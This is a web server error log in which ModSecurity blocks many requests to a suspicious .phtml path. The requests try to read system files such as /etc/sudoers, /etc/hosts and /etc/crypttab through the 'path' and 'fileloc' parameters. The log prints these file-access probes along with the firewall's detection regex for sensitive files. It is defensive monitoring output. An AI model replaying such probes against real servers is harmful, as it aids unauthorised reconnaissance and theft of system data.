[Thu Mar 19 14:38:22.348296 2026] [:error] [pid 7235:tid 140411607643904] [client 57.141.18.122:46850] [client 57.141.18.122] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/chrony.keys"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0jvqxLDW4GITHUkSE3wAAARA"]
[Thu Mar 19 14:38:24.138326 2026] [proxy_fcgi:error] [pid 26799:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:43266] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:38:24.158533 2026] [:error] [pid 30077:tid 140411607643904] [client 57.141.18.11:46874] [client 57.141.18.11] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0j_u8EFLIOrSqIpvE4AAAAlA"]
[Thu Mar 19 14:38:24.159541 2026] [:error] [pid 17653:tid 140411565680384] [client 57.141.18.67:46868] [client 57.141.18.67] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0jsdf6f5d65gmYZSWrAAAAtU"]
[Thu Mar 19 14:38:24.161219 2026] [:error] [pid 7235:tid 140411725141760] [client 57.141.18.95:46872] [client 57.141.18.95] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/networks"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0j_qxLDW4GITHUkSE4gAAAQI"]
[Thu Mar 19 14:38:24.162565 2026] [:error] [pid 26799:tid 140411632822016] [client 57.141.18.79:46878] [client 57.141.18.79] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/subuid"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0j9a6ubjKNq_cu4Zy7wAAA00"]
[Thu Mar 19 14:38:24.164279 2026] [:error] [pid 7235:tid 140411574073088] [client 57.141.18.96:46862] [client 57.141.18.96] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0jvqxLDW4GITHUkSE4QAAARQ"]
[Thu Mar 19 14:38:24.408332 2026] [:error] [pid 27293:tid 140411565680384] [client 57.141.18.115:46894] [client 57.141.18.115] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/environment"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0kP-YZRR_7pZ7nDKnoQAAA9U"]
[Thu Mar 19 14:38:24.827387 2026] [:error] [pid 30077:tid 140411658000128] [client 57.141.18.13:46914] [client 57.141.18.13] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0kPu8EFLIOrSqIpvE4gAAAko"]
[Thu Mar 19 14:38:25.008276 2026] [:error] [pid 30077:tid 140411699963648] [client 57.141.18.98:46916] [client 57.141.18.98] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/securetty"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0kfu8EFLIOrSqIpvE4wAAAkU"]
[Thu Mar 19 14:38:25.470517 2026] [:error] [pid 17653:tid 140411607643904] [client 57.141.18.79:46932] [client 57.141.18.79] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/locales.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0kcdf6f5d65gmYZSWrgAAAtA"]
[Thu Mar 19 14:38:25.755633 2026] [:error] [pid 15826:tid 140411599251200] [client 57.141.18.77:46944] [client 57.141.18.77] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/crypttab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0keoXxyEfFpUF8f8ozAAAAVE"]
[Thu Mar 19 14:38:25.844749 2026] [:error] [pid 7893:tid 140411616036608] [client 57.141.18.44:46946] [client 57.141.18.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0kRCii7xarUs8iHYFoAAAAg8"]
[Thu Mar 19 14:38:26.354301 2026] [:error] [pid 17653:tid 140411699963648] [client 57.141.18.88:46960] [client 57.141.18.88] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0ksdf6f5d65gmYZSWrwAAAsU"]
[Thu Mar 19 14:38:26.805452 2026] [:error] [pid 15826:tid 140411674785536] [client 57.141.18.41:46982] [client 57.141.18.41] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0kuoXxyEfFpUF8f8ozQAAAUg"]
[Thu Mar 19 14:38:26.933462 2026] [:error] [pid 7545:tid 140411649607424] [client 57.141.18.54:46986] [client 57.141.18.54] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0kn8B84UptSoTJtYrVAAAAYs"]
[Thu Mar 19 14:38:27.511912 2026] [:error] [pid 15826:tid 140411557287680] [client 57.141.18.22:46930] [client 57.141.18.22] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/rsyslog.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0k-oXxyEfFpUF8f8ozgAAAVY"]
[Thu Mar 19 14:38:27.543460 2026] [:error] [pid 7545:tid 140411632822016] [client 57.141.18.52:46992] [client 57.141.18.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/x11"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0k38B84UptSoTJtYrVQAAAY0"]
[Thu Mar 19 14:38:28.249537 2026] [:error] [pid 27293:tid 140411683178240] [client 57.141.18.97:47006] [client 57.141.18.97] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/libuser.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0lP-YZRR_7pZ7nDKnpgAAA8c"]
[Thu Mar 19 14:38:28.415513 2026] [:error] [pid 27293:tid 140411599251200] [client 57.141.18.117:47010] [client 57.141.18.117] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0lP-YZRR_7pZ7nDKnpwAAA9E"]
[Thu Mar 19 14:38:28.609321 2026] [:error] [pid 7545:tid 140411599251200] [client 57.141.18.92:47020] [client 57.141.18.92] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sudoers"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0lH8B84UptSoTJtYrVwAAAZE"]
[Thu Mar 19 14:38:28.777028 2026] [:error] [pid 7545:tid 140411574073088] [client 57.141.18.75:47022] [client 57.141.18.75] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc6.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0lH8B84UptSoTJtYrWAAAAZQ"]
[Thu Mar 19 14:38:29.238553 2026] [:error] [pid 27293:tid 140411658000128] [client 57.141.18.4:47030] [client 57.141.18.4] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0lf-YZRR_7pZ7nDKnqAAAA8o"]
[Thu Mar 19 14:38:29.477323 2026] [:error] [pid 7235:tid 140411641214720] [client 57.141.18.39:47042] [client 57.141.18.39] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0lfqxLDW4GITHUkSE5QAAAQw"]
[Thu Mar 19 14:38:31.414584 2026] [:error] [pid 7235:tid 140411616036608] [client 57.141.18.40:47068] [client 57.141.18.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0lvqxLDW4GITHUkSE5gAAAQ8"]
[Thu Mar 19 14:38:31.414824 2026] [:error] [pid 7893:tid 140411641214720] [client 57.141.18.72:47070] [client 57.141.18.72] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/profile.rpmnew"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0lhCii7xarUs8iHYFpwAAAgw"]
[Thu Mar 19 14:38:31.416475 2026] [:error] [pid 27293:tid 140411674785536] [client 57.141.18.108:47058] [client 57.141.18.108] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/hosts"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0lv-YZRR_7pZ7nDKnqgAAA8g"]
[Thu Mar 19 14:38:31.416828 2026] [:error] [pid 30077:tid 140411590858496] [client 57.141.18.85:47064] [client 57.141.18.85] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0lvu8EFLIOrSqIpvE5gAAAlI"]
[Thu Mar 19 14:38:31.455697 2026] [:error] [pid 17653:tid 140411590858496] [client 57.141.18.36:47076] [client 57.141.18.36] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/man_db.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0l8df6f5d65gmYZSWsQAAAtI"]
